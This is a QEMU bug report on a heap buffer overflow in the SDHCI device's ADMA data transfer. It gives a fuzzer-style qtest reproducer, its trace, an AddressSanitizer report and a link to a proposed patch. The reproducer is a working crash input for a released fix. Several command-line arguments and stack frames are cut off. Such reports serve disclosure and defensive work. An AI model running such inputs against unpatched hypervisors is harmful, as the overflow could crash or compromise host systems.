Heap-overflow in flatview_read through sdhci_data_transfer
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
QEMU |
Fix Released
|
Undecided
|
Unassigned |
Bug Description
Hello,
Reproducer:
cat << EOF | ./qemu-system-i386 -nodefaults \
-device sdhci-pci,
-device sd-card,
-drive if=sd,index=
-nographic -qtest stdio -accel qtest
outl 0xcf8 0x80001010
outl 0xcfc 0xd7055dba
outl 0xcf8 0x80001003
outl 0xcfc 0x86b1d733
writeq 0xd7055d2b 0x84126e0ed7d7355e
writeq 0xd7055d23 0x13bd7d7346e0129
writeq 0xd7055d05 0x615bfb845e05c42c
write 0x0 0x1 0x39
write 0x5 0x1 0x06
write 0x6 0x1 0x35
write 0x7 0x1 0x01
write 0x1350600 0x1 0x39
writew 0xd7055d0e 0x846e
write 0x1350600 0x1 0x29
write 0x1350602 0x1 0x1a
write 0x1350608 0x1 0x39
clock_step
writeq 0xd7055d03 0x6d00000026000000
clock_step
EOF
The trace:
[R +0.077745] outl 0xcf8 0x80001010
OK
[S +0.077773] OK
[R +0.077792] outl 0xcfc 0xd7055dba
OK
[S +0.077813] OK
[R +0.077826] outl 0xcf8 0x80001003
OK
[S +0.077835] OK
[R +0.077846] outl 0xcfc 0x86b1d733
OK
[S +0.080186] OK
[R +0.080204] writeq 0xd7055d2b 0x84126e0ed7d7355e
752161@
752161@
752161@
752161@
OK
[S +0.080255] OK
[R +0.080267] writeq 0xd7055d23 0x13bd7d7346e0129
752161@
752161@
752161@
752161@
752161@
OK
[S +0.080303] OK
[R +0.080316] writeq 0xd7055d05 0x615bfb845e05c42c
752161@
752161@
752161@
752161@
OK
[S +0.080350] OK
[R +0.080362] write 0x0 0x1 0x39
OK
[S +0.080606] OK
[R +0.080617] write 0x5 0x1 0x06
OK
[S +0.080629] OK
[R +0.080639] write 0x6 0x1 0x35
OK
[S +0.080648] OK
[R +0.080657] write 0x7 0x1 0x01
OK
[S +0.080665] OK
[R +0.080675] write 0x1350600 0x1 0x39
OK
[S +0.080863] OK
[R +0.080875] writew 0xd7055d0e 0x846e
752161@
752161@
752161@
752161@
752161@
752161@
752161@
752161@
752161@
752161@
752161@
752161@
752161@
OK
[S +0.080979] OK
[R +0.080991] write 0x1350600 0x1 0x29
OK
[S +0.081001] OK
[R +0.081011] write 0x1350602 0x1 0x1a
OK
[S +0.081019] OK
[R +0.081029] write 0x1350608 0x1 0x39
OK
[S +0.081037] OK
[R +0.081045] clock_step
752161@
752161@
752161@
752161@
752161@
752161@
752161@
752161@
OK 100
[S +0.081112] OK 100
[R +0.081126] writeq 0xd7055d03 0x6d00000026000000
752161@
752161@
752161@
752161@
OK
[S +0.081162] OK
[R +0.081171] clock_step
752161@
752161@
752161@
=======
==752161==ERROR: AddressSanitizer: heap-buffer-
WRITE of size 786432 at 0x61500001e500 thread T0
#0 0x5651bce1a93f in __asan_memcpy (/home/
#1 0x5651bf4197ce in flatview_
#2 0x5651bf41bff3 in flatview_read /home/alxndr/
#3 0x5651bf41bb48 in address_
#4 0x5651bf41cce8 in address_space_rw /home/alxndr/
#5 0x5651bd623b67 in dma_memory_
#6 0x5651bd623585 in dma_memory_rw /home/alxndr/
#7 0x5651bd6227b7 in dma_memory_read /home/alxndr/
#8 0x5651bd61b052 in sdhci_do_adma /home/alxndr/
#9 0x5651bd60d3c4 in sdhci_data_transfer /home/alxndr/
#10 0x5651c0c4d917 in timerlist_
#11 0x5651c0c4de51 in qemu_clock_
#12 0x5651bf562a13 in qtest_clock_warp /home/alxndr/
#13 0x5651bf74f5d8 in qtest_process_
#14 0x5651bf73d63e in qtest_process_inbuf /home/alxndr/
#15 0x5651bf73c3e3 in qtest_read /home/alxndr/
#16 0x5651c0842762 in qemu_chr_
#17 0x5651c08428aa in qemu_chr_be_write /home/alxndr/
#18 0x5651c0868514 in fd_chr_read /home/alxndr/
#19 0x5651c0754736 in qio_channel_
#20 0x7fac88fad4cd in g_main_
#21 0x5651c0cdfc67 in glib_pollfds_poll /home/alxndr/
#22 0x5651c0cdd567 in os_host_
#23 0x5651c0cdcf47 in main_loop_wait /home/alxndr/
#24 0x5651bf4bb08d in qemu_main_loop /home/alxndr/
#25 0x5651bce4d51c in main /home/alxndr/
#26 0x7fac887b6cc9 in __libc_start_main csu/../
#27 0x5651bcda2cf9 in _start (/home/
0x61500001e500 is located 0 bytes to the right of 512-byte region [0x61500001e300
allocated by thread T0 here:
#0 0x5651bce1b5b2 in calloc (/home/
#1 0x7fac88fb3210 in g_malloc0 (/usr/lib/
#2 0x5651bd8cd222 in sdhci_pci_realize /home/alxndr/
#3 0x5651bd88c228 in pci_qdev_realize /home/alxndr/
#4 0x5651c07a4ec9 in device_set_realized /home/alxndr/
#5 0x5651bfe384b8 in property_set_bool /home/alxndr/
#6 0x5651bfe2c1cf in object_property_set /home/alxndr/
#7 0x5651bfe49471 in object_
#8 0x5651bfe2d890 in object_
#9 0x5651c078cc64 in qdev_realize /home/alxndr/
#10 0x5651bd8bd8cc in qdev_device_add /home/alxndr/
#11 0x5651bf4e3e43 in device_init_func /home/alxndr/
#12 0x5651c0af71e4 in qemu_opts_foreach /home/alxndr/
#13 0x5651bf4cd04b in qemu_init /home/alxndr/
#14 0x5651bce4d517 in main /home/alxndr/
#15 0x7fac887b6cc9 in __libc_start_main csu/../
SUMMARY: AddressSanitizer: heap-buffer-
Shadow bytes around the buggy address:
0x0c2a7fffbc50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2a7fffbc60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fffbc70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fffbc80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fffbc90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c2a7fffbca
0x0c2a7fffbcb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2a7fffbcc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2a7fffbcd0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2a7fffbce0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2a7fffbcf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==752161==ABORTING
-Alex
Proposed patch /lists. nongnu. org/archive/ html/qemu- devel/2020- 08/msg07968. html
-> https:/